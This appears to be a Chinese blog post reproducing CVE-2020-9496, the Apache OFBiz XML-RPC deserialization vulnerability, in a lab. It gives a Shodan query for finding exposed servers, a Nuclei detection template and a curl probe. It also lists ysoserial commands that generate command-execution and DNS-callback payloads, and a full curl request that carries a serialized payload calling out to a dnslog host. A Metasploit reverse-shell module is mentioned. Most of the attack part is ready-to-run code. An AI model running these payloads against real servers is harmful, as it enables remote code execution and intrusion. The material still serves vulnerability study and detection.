CVE-2020-9496_OFBiz反序列化漏洞复现

靶机实验

影响范围

  • < 17.12.04版本

资产特征

  • Set-Cookie : OFBiz.Visitor

shodan搜索相关资产

1
shodan search --fields ip_str,port,org,hostnames OFBiz.Visitor

具体就不贴了。

POC

cve-2020-9496

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
id: CVE-2020-9496

info:
  name: Apache OFBiz XML-RPC Java Deserialization
  author: dwisiswant0
  severity: medium

  # This temaplte detects a Java deserialization vulnerability in Apache
  # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for
  # versions prior to 17.12.04.
  # --
  # References:
  # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz

requests:
  - raw:
      - |
        POST /webtools/control/xmlrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "faultString"
          - "No such service [ProjectDiscovery]"
          - "methodResponse"
        condition: and
        part: body
      - type: word
        words:
          - "Content-Type: text/xml"
        part: header
      - type: status
        status:
          - 200

方法一

1
echo "https://localhost:8443" | nuclei -t cves/CVE-2020-9496.yaml

方法二

1
curl https://localhost:8443/webtools/control/xmlrpc -v -X POST -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'  -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>' -k -H 'Content-Type: application/xml'

方法三

1
java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 "touch /tmp/cve-2020-9496" | base64 | tr -d "\n"
1
java -jar ysoserial-master-SNAPSHOT.jar URLDNS "http://dnslog.io" | base64 | tr -d "\n"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
POST /webtools/control/xmlrpc HTTP/1.1
Host: localhost:8443
Content-Type: application/xml
Content-Length: 4093

<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>
1
curl http://localhost:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAEWcxNjFjLmwuZG5zbG9nLmlvdAAAcQB+AAV0AARodHRwcHh0ABhodHRwOi8vZzE2MWMubC5kbnNsb2cuaW94</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'

方法四

msf里面有该反弹shell的exp。

参考链接